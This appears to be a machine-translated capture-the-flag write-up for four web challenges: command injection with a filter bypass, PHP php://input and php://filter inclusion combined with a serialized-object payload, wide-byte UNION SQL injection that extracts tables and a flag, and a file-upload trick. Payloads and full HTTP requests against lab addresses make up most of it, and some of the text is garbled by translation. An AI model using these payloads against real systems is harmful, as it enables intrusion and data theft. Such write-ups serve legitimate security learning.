0x01 Preface
Before a certain "Craftsman Cup" competition in a certain group's internal qualifiers, anyway, there was nothing to do, so I simply looked at the web questions and made a simple record.
0x02 web question
2.1 Command execution
1. From the point of view of the data packet, it can be guessed that there is a command execution in ip. There is a little filtering, but the filtering is not complete. After a try, ip=127.0.0.1|ls&submit=PING can succeed (guess that the code filtering here is mostly dvwa The command execution is the same as ('| '=>''), because there is an extra space after it, it can break through)
Build post and submit ip=127.0.0.1|ls&submit=PING to see flag.php
2. Then pass ip=127.0.0.1|pwd&submit=PING and the path is /var/www/html
3. Then just read it directly, it is found that there is a filter for spaces, payload: ip=127.0.0.1|cat$IFS/var/www/ html/flag.php&submit=PING can get flag
2.2 Deserialization
1. Direct access to the given address can see a hint of code
you are not admin !
<!--
$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];
if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
echo "hello admin!<br>";
include($file); //class.php
}else{
echo "you are not admin ! ";
}
-->
2. From the commented code, it can be seen that three parameters user, file, pass are to be passed
and then to break through if(isset( KaTeX parse error: Expected'EOF', got'&' at position 6: user)&̲&(file_get_cont … User,'r')===“the user is admin”)) In
other words, the user variable must be equal to the user is admin.
According to the comment, the file = class.php
pass variable is found in the code prompted It doesn't make much sense, you can ignore him
for the time being. First of all, I have to break through here. I thought of the php pseudo-protocol php://input to
construct the post data package as follows:
POST /?user=php://input&flie=class.php HTTP/1.1
Host: 192.168.1.1: 56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng, /;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17
The user is admin
then has to include class.php. Since the location of class.php is unknown, another encapsulation protocol of php is used: php://filter can read any file
using this protocol. Use method: php: //filter/convert.base64-encode/resource=index.php
here to convert the content of index.php read to base64 format
POST /?user=php://input&file=php://filter/convert. base64-encode/resource=class.php HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64 ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng, / ;q= 0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 17
User IS ADMIN The
PD9waHAKCmNsYXNzIFJlYWR7Ly9mMWFnLnBocAogICAgcHVibGljICRmaWxlOwogICAgcHVibGljIGZ1bmN0aW9uIF9fdG9TdHJpbmcoKXsKICAgICAgICBpZihpc3NldCgkdGhpcy0 + ZmlsZSkpewogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsKICAgICAgICB9CiAgICAgICAgcmV0dXJuICJfX3RvU3RyaW5nIHdhcyBjYWxsZWQhIjsKICAgIH0KfQo / Pgo =
stars base64 decoding a code by
<?php
class Read{
//f1ag.php
public $file;
public function __toString(){
if(isset($this->file)){
echo file_get_contents($this->file);
}
return "__toString was called!";
}
}
?>
Based on this, a deserialization parameter can be constructed. The specific data package is as follows
: POST /?user=php://input&file=class.php&pass=O:4:"Read":1:{s:4:"file";s: 57:"php://filter/read=convert.base64-encode/resource=f1ag.php";} HTTP/1.1
Host: 192.168.1.1:56782
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng, / ;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q= 0.9
Connection: close
Content-Length: 17
the user is admin
uses base64 decoding to get the flag
2.3 byte secret
Title description: The parameter id
directly accessed sql1.php and found that it is garbled, plus the prompt id given by the title itself, guessing that it may be wide byte injection.
After trying, it was found that it was wide byte injection
http://192.168.1.1:3036/sql1.php?id=%df'
1. Burst the library
http://192.168.1.1:3036/sql1.php?id=%df%27%20union%20select%201,%20database()%23得出数据库pwnhubsql1
2. Burst
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,group_concat(table_name)from%20information_schema.tables%20where%20table_schema=database()%23两个表article,flag
3. Explosion table field
guess in the flag table according to the table name, here the table flag is converted to hexadecimal
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,group_concat(column_name)from%20information_schema.columns%20where%20table_name=0x666c6167%23爆出字段id,thisisflag
4. Burst the flag
http://192.168.1.1:3036/sql1.php?id=%df%27union%20select%201,hex(group_concat(thisisflag))%20from%20flag%23
Decode this string of numbers in hexadecimal to get the flag
2.4 File upload
This question is more ironic
1. Just upload a picture, he said he wanted to give me a give_me_flag.php and I will give you the flag!
2. So I changed the name to give_me_flag.php to get the flag
0x03 summary
In general, the questions are relatively simple, and there is no special difficulty, just do it for fun, emmm and so on.